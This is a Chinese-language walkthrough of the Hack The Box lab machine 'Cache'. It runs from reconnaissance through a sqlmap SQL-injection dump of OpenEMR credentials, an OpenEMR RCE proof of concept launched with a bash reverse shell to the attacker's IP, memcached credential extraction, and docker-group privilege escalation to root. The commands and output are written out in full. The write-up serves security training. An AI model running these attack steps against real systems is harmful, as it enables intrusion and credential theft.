Recon

Nmap Scan

[toc]Nmap初步显示开放了两个端口,分别为80和22。随即从80端口开始入手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.80 scan initiated Sun Aug  9 12:47:22 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug  9 12:49:26 2020 -- 1 IP address (1 host up) scanned in 123.77 seconds

Web Enumeration

在滚动banner里获取到Host name:Cache.htb 在Web中发现author.html页面下存在作者名 Author ASH 以及一个项目为HMS

1
2
3
4
...
Check out his other projects like Cache:
HMS(Hospital Management System) 
...

将该域名添加至HOST文件中,猜测可能存在和HMS有关的域名,尝试hms.cache.htb无果,但是hms.htb成功。

在登录界面的源代码中,发现其调用了http://cache.htb/jquery/functionality.js,访问这个页面,取得的明文储存在js中的密码H@v3_fun,但是登录页面不需要这个密码,随便输入都可以登录,跳转到建设未完成的页面。

User.txt

OpenEMR

查阅Web指纹,确定版本为2018年前后的,上网查阅相关漏洞,在[这个链接]发现存在一个SQL注入漏洞。 将POST请求记录到本地,放入sqlmap中运行,取得该cms的用户名和密码。

1
2
3
4
5
6
7
8
9
10
11
12
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $cat post.req 
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: OpenEMR=3bk4f9a7j4h6p94chhnhtf3r5i; PHPSESSID=h3fakmmdtr24vnp31k2deuvi3v
Upgrade-Insecure-Requests: 1

最终取得的用户名和密码如下

1
2
3
4
5
6
7
8
┌─[✗]─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $sqlmap -r post.req -D openemr -T users_secure --dump
...
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

使用hashcat获得结果$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.:xxxxxx 同时在上述的pdf中,也说明存在rce但是要求是要登录,拿到用户凭证后就可以用[这个Poc],获得shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $python poc.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.16.8/1337 0>&1'                                                                                                                                                  
 .---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) 

   ={   P R O J E C T    I N S E C U R I T Y   }=    

         Twitter : @Insecurity                       
         Site    : insecurity.sh                     

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload
1
2
3
4
5
6
7
8
9
10
11
12
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]                                                                                                                        
└──╼ $nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )                                                                                                                         
Ncat: Listening on :::1337                                                                                                                                           
Ncat: Listening on 0.0.0.0:1337                                                                                                                                      
Ncat: Connection from 10.10.10.188.                                                                                                                                  
Ncat: Connection from 10.10.10.188:35164.                                                                                                                            
bash: cannot set terminal process group (2020): Inappropriate ioctl for device                                                                                       
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ id
id                                                                                                                                                                   
uid=33(www-data) gid=33(www-data) groups=33(www-data)

拿到Shell后使用之前在源代码中获取的密码,能够切换至用户ash。

1
2
3
4
5
www-data@cache:/home$ su - ash
Password: 
ash@cache:~$ cd
ash@cache:~$ cat user.txt 
d3a9cb94055ba6e0087aec05b250b271

Root.txt

Memcache

查看本地端口,靶机监听了11211端口,查看该端口进程,确认该端口为Memcache使用

1
2
3
4
5
6
7
8
9
10
11
ash@cache:/dev/shm$ netstat -anutp | grep 127.0.0.1
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:55136         127.0.0.1:11211         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:55168         127.0.0.1:11211         TIME_WAIT   -                   
udp        0      0 127.0.0.1:41070         127.0.0.53:53           ESTABLISHED -                   
ash@cache:/dev/shm$ ps -ef | grep 11211
memcache   943     1  0 Aug08 ?        00:00:24 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid
ash      20763 17528  0 07:32 pts/0    00:00:00 grep --color=auto 1121

结合[这篇文章]中提到的枚举方法,获得用户luffy的的密码

1
2
3
4
5
6
7
8
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

使用SSH登录后,查看用户组,发现位于Docker用户组内,GTFOBins中说明Docker用户组可以用于突破限制提权,[这是文章][这是GTFOBins],发现本地已经运行一个ubuntu的docker。 直接按照方法,提权成功,获得root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
luffy@cache:~$ id 
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        10 months ago       64.2MB
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@5cc8578e734e:/# id
uid=0(root) gid=0(root) groups=0(root)
root@5cc8578e734e:/mnt# cd /root/
root@5cc8578e734e:~# ls
root.txt
root@5cc8578e734e:~# cat root.txt 
64e1b13ccadfeb5b0bdb9b22e7b81777
root@5cc8578e734e:~#